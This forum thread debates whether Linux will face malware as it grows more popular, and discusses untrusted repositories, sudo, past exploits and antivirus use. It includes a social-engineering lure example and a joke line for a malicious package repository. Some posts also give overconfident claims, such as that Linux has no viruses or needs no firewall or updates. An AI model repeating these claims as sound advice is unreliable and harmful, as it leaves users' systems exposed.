To seriously think that adware, spware, virii and the like will NOT come to linux when and if the majority of computer users come to linux, then you are lying to yourself, plain and simple. We can boast linux security all we want to, but programmers will just find a way to circumvent it. It's a cat and mouse game that has been happening on windows for a long time. Anways, I agree, I would rather my linux stayed low-profile, and if the day ever does come that this is no longer so, I will find something else that is low-profile.

They will be a different flavor, and besides, I don't want Windows ousted. Let microsoft have 80% of the home user market, Linux can have the enterprise, and Apple and the various distributions can divvy up the 20% of the home user market

There's a big difference between saying Linux will become a target of malware of various kinds and saying that Linux is just as susceptible as Windows is to automatically-propogating malware.

Yes, someone can create a .deb that, if I'm dumb enough to double-click it and give my password to it, can wreak havoc on my system. But isn't a lot more difficult to have something install without the user's consent and turn the computer into a spam zombie?

can anyone tell me how a virus works?

there are lots of different modes of attack for "viruses"

trojans are the most simple - you let them in, hence the trojan analogy.
some attach and modify system files.
some modify the interrupt jump table.
some run a process or a service.
...
...

that's what makes them so amazing... there is no one way to write a virus. the U of Calgary in Alberta Canada has a graduate course (maybe undergrad too?) on the writing if viruses.

Who doesn't enjoy a nice screensaver or saving money on air travel?

:lolflag:

I don't want Linux in every desktop either. But I'd really like 10 to 20% of desktops being Linux. That way we wouldn't be ignored by ISVs any longer, and Window's reduced desktop share would mean that writing malware would be a less useful activity: if Linux had 20% of desktops and Macs maybe 30%, any one piece of malware would be able to affect only half of all destops in the world (instead of 90+% like today)

As long as it's free, I could care less. The more people who use it, the more support there is. The fact that root passwords, etc. would be required puts it on the same security level (if not higher) than Mac OS, and miles ahead of Windows. And it would be nice if we started seeing software built for Linux, even if it costs money. The same goes for hardware drivers and the like.

As long as it's free, I could care less. The more people who use it, the more support there is. The fact that root passwords, etc. would be required puts it on the same security level (if not higher) than Mac OS, and miles ahead of Windows. And it would be nice if we started seeing software built for Linux, even if it costs money. The same goes for hardware drivers and the like.

I don't really agree with this... because think of who supports the user influx and who pays for it... we do. I don't have any needs (hardware support or software desired) that are unfulfilled, so a huge new-user influx will only strain the community and bring more corporations into the fold who want to make money off of what is more a cultural movement right now than anything else. Look at what happened to punk rock when the record companies moved in with all their money... I see this a very real threat, so in many ways I don't want to see linux on everyones desktop.

I don't mean to say I don't want new users... I think that anyone who, with clear intentions, wants to learn linux should get the full support of the community, because it isn't for us to horde, but it is to be enjoyed, not just used.

I don't really agree with this... because think of who supports the user influx and who pays for it... we do. I don't have any needs (hardware support or software desired) that are unfulfilled, so a huge new-user influx will only strain the community and bring more corporations into the fold who want to make money off of what is more a cultural movement right now than anything else. Look at what happened to punk rock when the record companies moved in with all their money... I see this a very real threat, so in many ways I don't want to see linux on everyones desktop.

I don't mean to say I don't want new users... I think that anyone who, with clear intentions, wants to learn linux should get the full support of the community, because it isn't for us to horde, but it is to be enjoyed, not just used.

I was once a new user, and every day I learn more. Maybe that's just because I'm very interested, but I imagine that, just as there is plenty of free Windows support via forums, Linux would remain the same. Also, unlike Punk Rock, Linux can always fork...and fork...and fork...When all you depend on is a kernel and some base packages, it's pretty easy to remain a community movement.

I hope Linux never becomes mainstream.
Most distros probably never will be, but Ubuntu, in all its popularity, will gain a high percentage of usage...

The same can be said for many things.
"Outcasted" cultures and such can be great, but once (and if) they become mainstream, they'll never be the same.

Take skateboarding:
Many of us prefer it when it is dead, because only the TRUE skaters are with us, maybe with the exception of a few.
When skateboarding gains popularity, as it usually does at stages, at least 90% of skaters are "fake", only doing it because they think it's "cool", and will likely quit when it begins to die again.

Similar things can be said for Linux, though this is potentially worse, as there is also the problem of security and such.

I disagree with the idea that Linux becoming mainstream would kill the community. Thing is, "Linux" will never become mainstream. Maybe a few distros will (those which fit a market niche such as being decent desktop OSes), but does anyone think that Gentoo will ever be dominant among regular users? Slackware? LFS? There'll always be a place for community Linux, as long as it remains free as in freedom.

to be honest, i am a nonconformist too, allergic to crowd mentality. i understand the analogy of music being highjacked to Capitalist Island happening to Linux, but I believe it's not fair to deprive the rest of the world of decent OS's. i have had hell with Micro$oft's OS's, and i honestly do not wish my anguish on anyone. my friends are experiencing meltdowns with Window$ too, and i try to help them by nudging them in the direction of Mac or Open Source. it's not about being cool or whatever at all. it's people's sanity and data at stake. i think this exclusivity mentality will defeat the purpose of beautifully written code and secure systems. i believe that if Linux remains to be a geek's OS, it will only die, for lack of propagation. maybe developers will want to expand it for the sheer love of the code. but what would it seek to accomplish? anything that doesn't have a purpose dies a natural death. i hope the Linux community will understand that it's not about the pursuit of exclusivity that matters, but it should be alleviating the suffering of peers. above anything in life, i believe that this should be one's foremost purpose. maybe then we'll see the better world we're whining to have. :p

The more graphical frontends we have for configuring things like /etc/X11/xorg.conf or /etc/fstab, the less relevant file/folder hierarchy is. This is really only an issue because sometimes people still have to go into the guts of the operating system.

When Linux (wathever distro) reaches that 80% marketshare milestone :mrgreen:, I'm sure the world will be flooded with linux virusses.

But I'm 100% convinced that 99% of the current users wont be impacted by it. That is, as long as you stay to trusted repositories, virusses wont have a chance to infest your machine. No distro will risk the shame of being the first to push a virus in it's repositories. So all packages that they enter in there, will be doublechecked.

But, if you install dubious software as root.... you deserve the ****.

I ran my XP behind a NAT and without any virusscanners or firewall enabled. Never had a problem. But I was also smart enough to donwload any risky software while at work. Their FW's and virusscanners were much better to intercept anything spooky.

As for linux. I don't even need the NAT anymore (besides for sharing my internet off course), so I have a NAT rule in my router to forward all unmatched packets to my main linux machine. Not safe :mrgreen:, but as my machine doesn't have any 'unknown' open ports, it can't do any harm. And if I do open a port, it's up to me to be sure that I keep my box safe.

Sorry.. but I like Linux the way it is and want the average user to think its only for hackers or people who like to use the command pormpt. I want to keep linux our "little secret"

That is really selfish and not at all in the spirit of Ubuntu.

As far as viruses and such, I used to think it was simply a matter of Linux being overlooked. But really it does come down to the architecture of the OS. I do not fear that Linux, Mac, or the BSD's will be the breeding ground for malware and the like the way Windows is.

As we all know, 80-90% of home users use Windows and about 99.9% of all viruses are Windows only and Windows is the only OS that can get spyware (basically) and this is mainly because virus writers/spyware writers/etc focus on Windows because it's the most popular OS. Now, assume in 2 years, 25-50% of home computer users have moved over to Linux, do you guys think it will start to suffer the same flaws as windows with tons of exploits, virii, spyware, extremely bloated code, etc?

I am afraid that it will be a reality, should Ubuntu get sufficient popular.

Read any three pages of the thread I merged you with. You'll find you're partially correct.

Though I can I see it being less of a problem if it did happen.

Microsoft only has its employees to fix code. Linux/Ubuntu has 1000s of volunteers and companies that have access the source code and expertise to solve these problems very quickly.

I would imagine any virus or vulnerability that gets exploited will be fixed a lot quicker in Linux/Ubuntu that it ever could with Microsoft.

assume in 2 years, 25-50% of home computer users have moved over to Linux, do you guys think it will start to suffer the same flaws as windows with tons of exploits, virii, spyware, extremely bloated code, etc?

No. Simply because of the philosophy of Linux protection. If you are really interested, read something about cron and init for a start. ;) Also, if you have some virus on your computer, you will have to be logged in as root so you could run it, just like any other executable.

No. Simply because of the philosophy of Linux protection. If you are really interested, read something about cron and init for a start. ;) Also, if you have some virus on your computer, you will have to be logged in as root so you could run it, just like any other executable.

How so? I can run most any application without being root --- the file just needs to be marked as executable.

People running linux may not be able to infect themselves using the traditional methods like e-mailed viruses (opening unsolicited attachments and what-not) but once linux gains enough of a foot-hold, hackers will target linux using all sorts of methods:
- untrusted repositories / installation sources
- bundling scumware with desired software
- improperly secured computers running unneeded services
- unpatched computers running packages with vulnerabilities
- brute-force cracking or running services

Bad guys don't want to damage your computer any more; they want to own it. They want your data, your processing power and the ability to blast spam and other crap from your machine.

-Dave

Linux? Perhaps. Linux is developing so fast that there is not enough code review at the moment. So in this regard, there could be exploits. BSD on the other hand (not counting that fringe child OS X... I don't trust it's security... they are the ones that truely benefit from small market share in a security sense) has excellent code review and release (IMO) a far more secure product. This is at the risk of slowing development, but worth it for many.

Back to the point, linux security will never be as bad as MS. Think of all the high-profile servers that run linux... if they were vulnerable they would be under attack more. Almost every attack you hear about on a linux server was the fault of some idiot tech who made a password like "bob" and it was broken... surprise!!! So clearly it is not all about market share.

How so? I can run most any application without being root --- the file just needs to be marked as executable.


Every unknown application under Linux is not marked as executable dude! ](*,)

I thought we've laerned that already. :roll:

:rolleyes:

The protection logics (algorithms) under Linux is simply different. It doesn't go just like that.

btw, I see that you didn't read enything about cron and init. :D When you read that, you'll se what I'm talking about. ;)

Every unknown application under Linux is not marked as executable dude! ](*,)

I thought we've laerned that already. :roll:

- What if it's downloaded from a repository (untrusted (http://www.flickr.com/photos/trevi55/296804891/)* or not)?
- What if some guy creates a .deb file and hosts it on their server for everyone to download and install (ever use Automatix (http://www.getautomatix.com/wiki/index.php?title=Installation#Ubuntu_7.04_.28Feisty _i386.29)?)
- What if somebody sends a gullible person a script and says, oh yeah, before it'll run you need to:
chmod +x naked-pics-of-britney.sh
- What if the hacker enters via any number of other ways and marks it as executable themselves?
- What if a buffer overflow (http://www.securityfocus.com/bid/22771/discuss) in some desktop applications that can run arbitrary code

* the above link shows a prank that some guy played on a bunch of Ubuntu users who used Trevino's repo to install Beryl. You might be smart enough not to eat yellow snow, but there are plenty of users who don't have a clue and will do whatever they're told --- it's lemon-flavoured, I promise!

Ubuntu had a unpatched VNC vulnerability (https://bugs.launchpad.net/ubuntu/+source/vnc4/+bug/77383) for 8 months (discovered in May 2006, not patched until January 2007)! No need to hack... hell, the bad guys could connect without needing a password! Add to that all of the various PHP, SQL and other applications and services that someone might be running and you have a number of ways that your system could be compromised.

btw, I see that you didn't read enything about cron and init. :D When you read that, you'll se what I'm talking about. ;)

Why don't you enlighten us? Provide a link to what the heck you're talking about.

By the way, I'm not trying to say that Windows is more secure than Linux (or vice-versa, for that matter), I just don't think Linux users should believe that they are not vulnerable.

-Dave

Why don't you enlighten us? Provide a link to what the heck you're talking about.


I only have some good books about it. :( If I find some good links, I'll post it. ;)


I'm not trying to say that Windows is more secure than Linux (or vice-versa, for that matter), I just don't think Linux users should believe that they are not vulnerable.


Afcourse, nothing is safe! ;) You may have the best protection, but if you don't know what you're doing, it doesn't matter then. :P I have a friend who never had any problems with security, but when he installed Firestarter, and thought he configured it fine, that's when the intrusions started. :lolflag:

@BrokeBody:

About cron: if you are inferring that cron jobs can only be run as root, you are mistaken. In the Debian/Ubuntu model, there is no normal root user; cron jobs are set in the user's crontab and do not require a password:
crontab -e
The above command will allow you to edit the existing user's crontab and add/remove anything you like. You can also add stuff to the user's SESSION.

My point is that there is no one single point of entry on any computer system. Social engineering, unpatched applications, services and OSes, unnecessary services, poor passwords, installing unknown/untrusted programs, buffer overflows, viruses, malware, etc. are all ways into a system. Linux may be better at some things, but it can and does get hacked.

Be diligent with security. Keep your OS up-to-date. Run a firewall. Turn off unneeded services. Do not install from untrusted sources. Run Clam. Run rootkit hunter.

Afcourse, nothing is safe! ;) You may have the best protection, but if you don't know what you're doing, it doesn't matter then...

Now we're on the same page... if only we could keep the end-users away from the system! :)

Take care,
-Dave

Now we're on the same page... if only we could keep the end-users away from the system! :)

Take care,
-Dave

here's what i think the answer is...Thin clients...all our apps and OS and stuff will be run from fat servers on the interwebs and EVERYONE will just have a thinclient that automagically connects to those interweb servers and there you have all your stuff

here's what i think the answer is...Thin clients...all our apps and OS and stuff will be run from fat servers on the interwebs and EVERYONE will just have a thinclient that automagically connects to those interweb servers and there you have all your stuff

Wel the end user uses XDMCP in your case so it is the same as working on a local system only the cpu tasks are done on the server.

- What if it's downloaded from a repository (untrusted (http://www.flickr.com/photos/trevi55/296804891/)* or not)?
- What if some guy creates a .deb file and hosts it on their server for everyone to download and install (ever use Automatix (http://www.getautomatix.com/wiki/index.php?title=Installation#Ubuntu_7.04_.28Feisty _i386.29)?)
- What if somebody sends a gullible person a script and says, oh yeah, before it'll run you need to:
chmod +x naked-pics-of-britney.sh
- What if the hacker enters via any number of other ways and marks it as executable themselves?
- What if a buffer overflow (http://www.securityfocus.com/bid/22771/discuss) in some desktop applications that can run arbitrary code

* the above link shows a prank that some guy played on a bunch of Ubuntu users who used Trevino's repo to install Beryl. You might be smart enough not to eat yellow snow, but there are plenty of users who don't have a clue and will do whatever they're told --- it's lemon-flavoured, I promise!

Ubuntu had a unpatched VNC vulnerability (https://bugs.launchpad.net/ubuntu/+source/vnc4/+bug/77383) for 8 months (discovered in May 2006, not patched until January 2007)! No need to hack... hell, the bad guys could connect without needing a password! Add to that all of the various PHP, SQL and other applications and services that someone might be running and you have a number of ways that your system could be compromised.



Why don't you enlighten us? Provide a link to what the heck you're talking about.

By the way, I'm not trying to say that Windows is more secure than Linux (or vice-versa, for that matter), I just don't think Linux users should believe that they are not vulnerable.

-Dave

90% of what you have listed is user error. Of course anyone can write a script to harm you computer or host a bad deb... but when the OS tells users NOT to install untrusted content and gives them alternatives... then the user is at fault. You can never idiot-proof the user. That said, for people with common sense who don't enter their root password when they shouldn't, this isn't an issue. The long delay on the bug-fix is alarming, though if you are behind a firewall like a router its not important (and in reality, everyone should be using firewalls). I still hold that BSD is more secure (not counting OSX), but linux is pretty darn good too.

I think this article explains the issues quite well.

http://www.theregister.co.uk/security/security_report_windows_vs_linux/

Sorry mate, just have to follow up on a few of these :)

- What if it's downloaded from a repository (untrusted (http://www.flickr.com/photos/trevi55/296804891/)* or not)?

You still have to enter the sudo password to let it do anything harmful.

- What if some guy creates a .deb file and hosts it on their server for everyone to download and install (ever use Automatix (http://www.getautomatix.com/wiki/index.php?title=Installation#Ubuntu_7.04_.28Feisty _i386.29)?)

You still have to enter the sudo password to let it do anything harmful.

- What if somebody sends a gullible person a script and says, oh yeah, before it'll run you need to:
chmod +x naked-pics-of-britney.sh

So the script is then executable. Doesn't mean it can do anything more than the current user has permission to do.

- What if the hacker enters via any number of other ways and marks it as executable themselves?

Which other ways?

- What if a buffer overflow (http://www.securityfocus.com/bid/22771/discuss) in some desktop applications that can run arbitrary code

That bug only allows something to run code as the current user. There are no privilege escalations with it.

* the above link shows a prank that some guy played on a bunch of Ubuntu users who used Trevino's repo to install Beryl. You might be smart enough not to eat yellow snow, but there are plenty of users who don't have a clue and will do whatever they're told --- it's lemon-flavoured, I promise!


Where? I read the link and it didn't say anything about that.

Ubuntu had a unpatched VNC vulnerability (https://bugs.launchpad.net/ubuntu/+source/vnc4/+bug/77383) for 8 months (discovered in May 2006, not patched until January 2007)! No need to hack... hell, the bad guys could connect without needing a password!

Yes unacceptable. As a side note I've never trusted VNC and always used NX.

Add to that all of the various PHP, SQL and other applications and services that someone might be running and you have a number of ways that your system could be compromised.

Such as what? Are we talking about a home user or a web server? A home user won't be running web facing PHP scripts, same with SQL. In the enterprise SQL is only ever not locked down to localhost if its locked down to other IP's and thats only by sysadmins who really should know what they're doing. Nigh on no-one running a home machine is not NAT'd so if anythings web facing then someone has done it on purpose.

Root is a brick wall, no matter what. Even if a script or application is made executable it still needs root privileges to do anything REALLY nasty. Sure it can wipe out your home dir and all your family photos or whatever but it can't look at /etc/shadow and run john on it to find out all your system passwords or start writing 0's to your HDD etc. The only time root isn't a brick wall is if a root exploit is present on an unpatched system (and I haven't heard of any for any Linux distro for some time)

Sorry mate, just have to follow up on a few of these :)

No problem, Darren. My main point about all of this is that your system is only as secure as the weakest point --- mostly the users. Either the people that you know who run computers are really savvy, or you greatly underestimate the gullibilty, naivete and stupid actions of end-users! :)

Many linux users are computer hobbyists or professionals and enjoy learning and understanding how the system works. Now that distros like Ubuntu are becoming mainstream and ending up pre-installed on Dell's (and reviving the life out of older computers for mom & dad and other non-techies), there will be a new breed of linux users. These users will be the same ones who've been running XP as admin, not running an up-to-date AV, not running a firewall, not running Windows update, opening unsolicited attachments, etc.



You still have to enter the sudo password to let it do anything harmful.
Yes, you do. But that's never stopped a gullible user from doing it. My point about the .debs and untrusted repos is that the user is willingly choosing to install the software. And if you think they don't, then I'll show you a few hundred thousand users of Kazza, Morpheus, audiogalaxy, grokster, Limewire, Imesh, Gnutella that will beg to differ.

There was a Windows virus a few years back (Bagle?) that came in a password protected ZIP file. The e-mail contained the password to unlock the ZIP. Amazingly, people took the password from the e-mail and opened the ZIP file!

Trust me on this, if Linux prompts them to enter their password, they will! :)

So the script is then executable. Doesn't mean it can do anything more than the current user has permission to do.

No, but it may go out and download a .deb from somewhere, and then prompt the user to install it: "Hey! Something wants me to enter my password --- it better be good!"

Which other ways?
Again, depends on the installed applications and services, as well as the state of the apps and OS with regards to security updates, web facing apps/services, weak/default/no password. A feww notable examples:

- Slapper Worm (http://www.symantec.com/security_response/writeup.jsp?docid=2002-091311-5851-99) (from 2002, but still illustrates the point. Even after the bug was announced, 70% of apache systems tested were unpatched according to this article (http://www.newscientist.com/article.ns?id=dn3090)).
- CPanel Hack: (http://news.netcraft.com/archives/2006/09/23/hostgator_cpanel_security_hole_exploited_in_mass_h ack.html) (granted, most home users wouldn't be running CPanel)
Sept. 23, 2006: HostGator says hackers compromised its servers using a previously unknown security hole in cPanel, the control panel software that is widely used by hosting providers. "I can tell you with all accuracy that this is definitely due to a cPanel exploit that provides root access and all cPanel servers are affected," said HostGator system administrator Tim Greer. "This issue affects all versions of cPanel, from what I can tell, from years ago to the current releases, including Stable, Release, Current and Edge."
- Check Secunia (http://secunia.com/historic_advisories/): Of the 25 vulnerabilities listed for April 19th & 20th, 10 are "Highly Critical" and all but 3 are cross-platform (1 is OSX; 2 are Windows only and the rest are apps that either cross-platform or distro specific - RedHat, slackware).

That bug only allows something to run code as the current user. There are no privilege escalations with it.
The write-up on the page does not discount privilege escalation:
An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.

By the way, my references are just single examples (perhaps not the best example of what sort of damage that can be done, either).

Where? I read the link and it didn't say anything about that.

Here's the link to the whole story (http://www.pthree.org/2006/11/23/untrusted-repositories/), with links back through the mayhem at Ubuntu Forums.

Such as what? Are we talking about a home user or a web server? A home user won't be running web facing PHP scripts, same with SQL. In the enterprise SQL is only ever not locked down to localhost if its locked down to other IP's and thats only by sysadmins who really should know what they're doing. Nigh on no-one running a home machine is not NAT'd so if anythings web facing then someone has done it on purpose.

We're talking mostly home users. I emphasized your point about sysadmins because the average home user is probably not a sysadmin. There are many (perhaps a small percentage overall, but not an insignificant number) of people who want to learn about programming, development, being a sysadmin, apache, postfix, php, perl, sql, etc. and will install these packages on their computer so that they can play with it and learn it.

Running any of these apps facing the web can be a disaster waiting to happen: default accounts not locked out, weak passwords, unpatched bugs, etc. People do this stuff all the time. Take a look in these forums --- there are dozens of threads asking for help on how to setup a web/mail/sql server. Here's the first one I found (http://ubuntuforums.org/showthread.php?t=403908&highlight=setting+up+a+home+web+server).

Root is a brick wall, no matter what. Even if a script or application is made executable it still needs root privileges to do anything REALLY nasty. Sure it can wipe out your home dir and all your family photos or whatever but it can't look at /etc/shadow and run john on it to find out all your system passwords or start writing 0's to your HDD etc. The only time root isn't a brick wall is if a root exploit is present on an unpatched system (and I haven't heard of any for any Linux distro for some time)

Finally, I don't disagree that Linux has a superior security model. I think the OSX/Debian style security is one of the best models to use, however, the biggest weakness generally sits between the keyboard and the chair.

Take care,
Dave

the biggest weakness generally sits between the keyboard and the chair. Fair enough. I can't really think of much of a way to make it much better though. Other than the 'It looks like you are trying to do something that may be harmful, please enter your password again to confirm', 'please enter your password one more time to really confirm' which leads to 'are you sure you wish to turn off repeated security nagging?'

Fair enough. I can't really think of much of a way to make it much better though...

Me neither (outside of education). I think the current model works as it should. People rarely read disclaimers and EULAs and warnings and blah, blah, blah, blah, blah... They just click "YES", "I AGREE", "OK" as fast as they can and hope that they'll be using the software in less than 1 minute (no manuals for me!).

I think Douglas Engelbart (http://en.wikipedia.org/wiki/Douglas_Engelbart) (co-inventor of the computer mouse, hypertext and gui precursors) said it best (I'm paraphrasing here --- I can't find a reference to the interview he gave on TechTV a few years back) about how software companies are constantly "lowering the bar" with respect to computers. He spoke about how the computer is such a wonderful & powerful tool that can be used to accomplish so much more if only people would "raise the bar" and learn to use it.

Of course, all of this might have a down-side --- I might be out of a job!

I don't want this to turn into a Mac-bashing session, so please don't make it one. If you do, I'll just move those posts to the Jail.

I saw a news article today: Hacker breaks into Mac at security conference: $10,000 prize for the CanSecWest challenge winner (http://computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=cybercrime_and_hacking&articleId=9017380&taxonomyId=82&intsrc=kc_top)

Some interesting snippets: In winning the contest, he exposed a hole in Safari, Apple Inc.'s browser. "Currently, every copy of OS X out there now is vulnerable to this," said Sean Comeau, one of the organizers of CanSecWest.

The conference organizers decided to offer the contest in part to draw attention to possible security shortcomings in Macs. "You see a lot of people running OS X saying it's so secure and frankly Microsoft is putting more work into security than Apple has," said Dragos Ruiu, the principal organizer of security conferences including CanSecWest The URL opened a blank page but exposed a vulnerability in input handling in Safari, Comeau said. An attacker could use the vulnerability in a number of ways, but Di Zovie used it to open a back door that gave him access to anything on the computer, Comeau said. One reason Macs haven't been much of a target for hackers is that there are fewer to attack, said Terri Forslof, manager of security response for TippingPoint. "It's an incentive issue. The Mac is not as widely deployed of a platform as say Windows," she said. In this case, the cash may have provided motivation. So my question is: are there vulnerabilities similar to this in Ubuntu? Would it be possible that someone could just send a URL that would then allow complete access to the computer? I've seen Javascript exploits come up for Firefox quite often, but they usually get patched within a week, if not a few days.

In other words, it's not really possible to have a completely secure (even leaving out user stupidity) system, right? The only real issue is... trying to get something as good as possible and then patching vulnerabilities as soon as they're discovered. Is that a fair assessment?

I don't want this to turn into a Mac-bashing session, so please don't make it one. If you do, I'll just move those posts to the Jail.

I saw a news article today: Hacker breaks into Mac at security conference: $10,000 prize for the CanSecWest challenge winner (http://computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=cybercrime_and_hacking&articleId=9017380&taxonomyId=82&intsrc=kc_top)

Some interesting snippets: So my question is: are there vulnerabilities similar to this in Ubuntu? Would it be possible that someone could just send a URL that would then allow complete access to the computer? I've seen Javascript exploits come up for Firefox quite often, but they usually get patched within a week, if not a few days.

In other words, it's not really possible to have a completely secure (even leaving out user stupidity) system, right? The only real issue is... trying to get something as good as possible and then patching vulnerabilities as soon as they're discovered. Is that a fair assessment?

I agree.

If anything it's like an immune system. You challenge it, fight off colds etc, and gain immunity.
I want security holes to be found and patched as fast possible... It helps that the code is out in the open I think, rather than something buried in a blackbox that may one day be stumbled upon...

*cough*

http://securitywatch.eweek.com/exploits_and_attacks/microsoft_urges_workaround_as_worm_hits_unpatched_ dns_flaw.html

And these folks are at one vendor's mercy too...

Any idea if it affects Konqueror too? I mean, they're a bit similar aren't they?

well in linux Ive never had any spyware, viruses, malware, trojans etc for the most of it I've never had an antivirus. There was a month or so there when using mepis that I had an antivirus running but that was just because it came with it.

and I quote

While malware is a growing problem for users of Windows operating systems, there is little evidence of the problem affecting users of Apple Macs running OS X or PCs instaled with Linux.

full story here at: http://news.bbc.co.uk/1/hi/technology/6591183.stm

Why was this article even written? it's quite a well known fact.

Well known to you and me perhaps but not necessarily the general public. Articles like that on BBC are very good it helps create awareness among less technically inclined.

Why was this article even written? it's quite a well known fact.

lol, what side of the bed did you get out of?

I know a number of people who work for the BBC technical staff and according to the rumours it goes something like this:

1) BBC fails to mention Ubuntu Feisty launch, complaints hit inbox
2) BBC Reports on Microsoft Asia deal $3 windows and isn't critical of why their doing it and doesn't mention open source or linux; cue second barrage of complaints.
3) Someone mentions that constantly ignoring Linux is possibly in breach of the BBCs charter to not favour any one business.
4) Mention Linux in Sophos press-release/'news article' to redress an assumed imbalance in the reporting.

Although why they couldn't have just reported the ubuntu launch or have been more critical towards Microsofts motives in the first place is obviously where they should be trying to make amends.

Oh well, the BBC have such a weird view that if something has a vocal minority (i.e Linux) then they need to offset it by ignoring it so they don't get into trouble with being imbalanced. unfortunately they're not equip obviously to deal with industry press releases and so are simply ignoring the general public's voice.

lol, what side of the bed did you get out of?

lol, what side of the bed did you get out of?

:mrgreen:

I agree that this is just a fact in endles loop. I do however expect mirrors like these :

deb http://freePrograms/~virus/ main

lol, what side of the bed did you get out of?

Apparently the wrong side, and. . .oh wow! - A Leo Sayer avatar!!??!! Too cool.

lol, what side of the bed did you get out of?

I woke up on the side where Captain Obvious should not be.

I woke up on the side where Captain Obvious should not be.

lol, fair enough but too be fair the article isn't just about linux but if it highlights to non linux users that linux is a more secure OS than Windows surely it can be no bad thing?

Apparently the wrong side, and. . .oh wow! - A Leo Sayer avatar!!??!! Too cool.

lol, you can touch him if you like!

lol, you can touch him if you like!

I haven't seen that picture in 20+ years. :guitar:

I haven't seen that picture in 20+ years. :guitar:

Still, only half the age of your avatar picture :lolflag:

I feel like dancing!

How sure are we that we're imune to viruses. Is it a waste of resourses to keep it running. Does anybody know anybody that ever had a virus, or know someone that knew someone. If nobody is running virus software how do we know that we don't have a virus right now? How do I know you don't have a virus?
I'm i just being paranoid or do you ever wonder the same thing. Hasn't your cpu been acting a little funny lately?:D

Well there's known linux virusses. It couldn't hurt :)

(And I did have funny cpu activity yesterday :o)

Linux viruses are very rare partly because the environment is not fertile for them to spread.
You need to enter a password to install at system level, so any damage from say a user level install (non password) affects user files (hopefully backed up?). More important is probably control of your i/o ports - and ubuntu comes with all ports closed by default. A Firewall GUI is easy to get if you want visibilty. The best basic security measure is to avoid a adsl (usb) modem but to use an adsl router (ethernet).

There are no viruses for linux at the moment. I wouldn't bother with antivirus anyway - what's the point?

Keep yourself behind a router and you will have no problems at all.

But that still seems complacent to me. It is considered good practice, essential really, to run anti-virus, anti-spyware, firewall, and have automatic updates enabled etc in windows. I understand that it's less dangerous to do without that in Linux, but surely its still good practice? Look at what happened to XP in 2004 which led to a complete rethinking of SP2. The same thing could happen to Linux, surely?

It is considered good practice, essential really, to run anti-virus, anti-spyware, firewall, and have automatic updates enabled etc in windows.

1: Linux isn't Windows

2: NEVER allow Windows update to run fully automatic, as it can easily install an incorrect hardware driver and render your PC non-bootable. (I speak from bitter experience)

2: NEVER allow Windows update to run fully automatic, as it can easily install an incorrect hardware driver and render your PC non-bootable. (I speak from bitter experience)

QFT.

Most of us are worried when we first come over this is true, and If you would feel better having AV installed go Ahead, But unlike windows most Linux Virus Scanners do not run in the back round all the time and you will Need to scan actively. Now I will also mention that as most things are installed from the Repo's or from trusted sites its not a real problem either.

Honestly thought its not need anymore here then it is on the Mac its a waste.

Some users run anti-virus software in Linux in order to scan files or emails they received from Windows users and which they will send to other Windows users. This way, you can prevent viruses from being sent to your friends and family.

You didn't answer my question though: Why is it not considered complacent to run without anti-virus?

If i were to install Ubuntu 7.04 on a relatives PC, and leave it with them, without anti-virus, and updates not on automatic, and i went back 5/6 years later (expected life of a family pc), can i really expect it to be virus free, after that long?

You didn't answer my question though: Why is it not considered complacent to run without anti-virus?

If i were to install Ubuntu 7.04 on a relatives PC, and leave it with them, without anti-virus, and updates not on automatic, and i went back 5/6 years later (expected life of a family pc), can i really expect it to be virus free, after that long?

They system will tell them when there are updates and it will be upto them to install if the chose to do so.

Perhaps this will answer the question for you. http://www.theregister.co.uk/2003/10/06/linux_vs_windows_viruses/

Running an antivirus on linux is sorta like putting up an armed guard at a church. You could, but what the hell is the point?

Like was said above, LINUX IS NOT WINDOWS. If you try to think of Linux as a free version of windows, you are going to have a very very bad time. Linux is like a motorcycle, and Windows is a sedan. They both get you from A to B, but they do it in very different ways, and if you try to steer a motorcycle like you would a car, you're going to end up in a very nasty crash.

EDIT: actually, to go with the motorcycle analogy, what you're doing is coming into a group of bikers, and asking us why we don't lock our doors.

Remember that there aren't any viruses for Linux - even though most webservers run on it - that's a pretty big target, and there still aren't any. Linux is fundamentally different to Windows. The whole concept of a virus only exists because of the shoddiness of Microsoft code.

i've been using linux exclusively for about 8 years, I've got relatives running linux for the last 3 years, and even with teenagers who browse the internet to all sorts of unreputable sites, and the click on any ad they see on the screen, and double-click on any email attachment they get from their friends, none of these machines have ever had a problem. and i never run updates - i just install from cd, install the apps i want, and leave it until i feel like changing distros (usually about once a year).

But that still seems complacent to me. It is considered good practice, essential really, to run anti-virus, anti-spyware, firewall, and have automatic updates enabled etc in windows. I understand that it's less dangerous to do without that in Linux, but surely its still good practice? Look at what happened to XP in 2004 which led to a complete rethinking of SP2. The same thing could happen to Linux, surely?


It is complacent to not get updates, but there is no need for a virus scanner, malware scanner or a firewall on a desktop.

Viruses are a particular category of vulnerability that exploit breaches in windows that cannot be closed, since closing them would break millions of people's computers. In GNU/Linux, this sort of thing does not exist. The software is more malleable.

Malware such as spyware, exploits the fact that you don't know what your computer is doing. Since GNU/Linux is Free-libre open source software, it would be very very unlikely that anyone could write some malware into the applications that make it into the archives.

A firewall is plain useless on a desktop. You will have to let traffic through any ports that need to use them. In Ubuntu, you know at all times what is listening to the network. Nothing is done behind your back. Not knowing (or not having the ability to know) what your computer is doing is the real vulnerability in proprietary operating systems.




You didn't answer my question though: Why is it not considered complacent to run without anti-virus?

If i were to install Ubuntu 7.04 on a relatives PC, and leave it with them, without anti-virus, and updates not on automatic, and i went back 5/6 years later (expected life of a family pc), can i really expect it to be virus free, after that long?

Well, it would not upgrade from one release to the next automatically. If it did, and if a virus scanner (or some other kind of security tool) really became necessary, it probably would be part of the base install and thus get installed along with other security upgrades.

But that still seems complacent to me. It is considered good practice, essential really, to run anti-virus, anti-spyware, firewall, and have automatic updates enabled etc in windows. I understand that it's less dangerous to do without that in Linux, but surely its still good practice? Look at what happened to XP in 2004 which led to a complete rethinking of SP2. The same thing could happen to Linux, surely?

Not really. Windows is set out in a different manner to the Unix-based OSes.

The thing is, that it needn't have happened to Windows. If Microsoft, all those years ago when XP launched, had insisted that the first user created on the system was an admin, and couldn't be used for anything other than system backup/restore type tasks, and then forced people to create another, lower-privileged account for general computer use, then the world would be in a different place now.

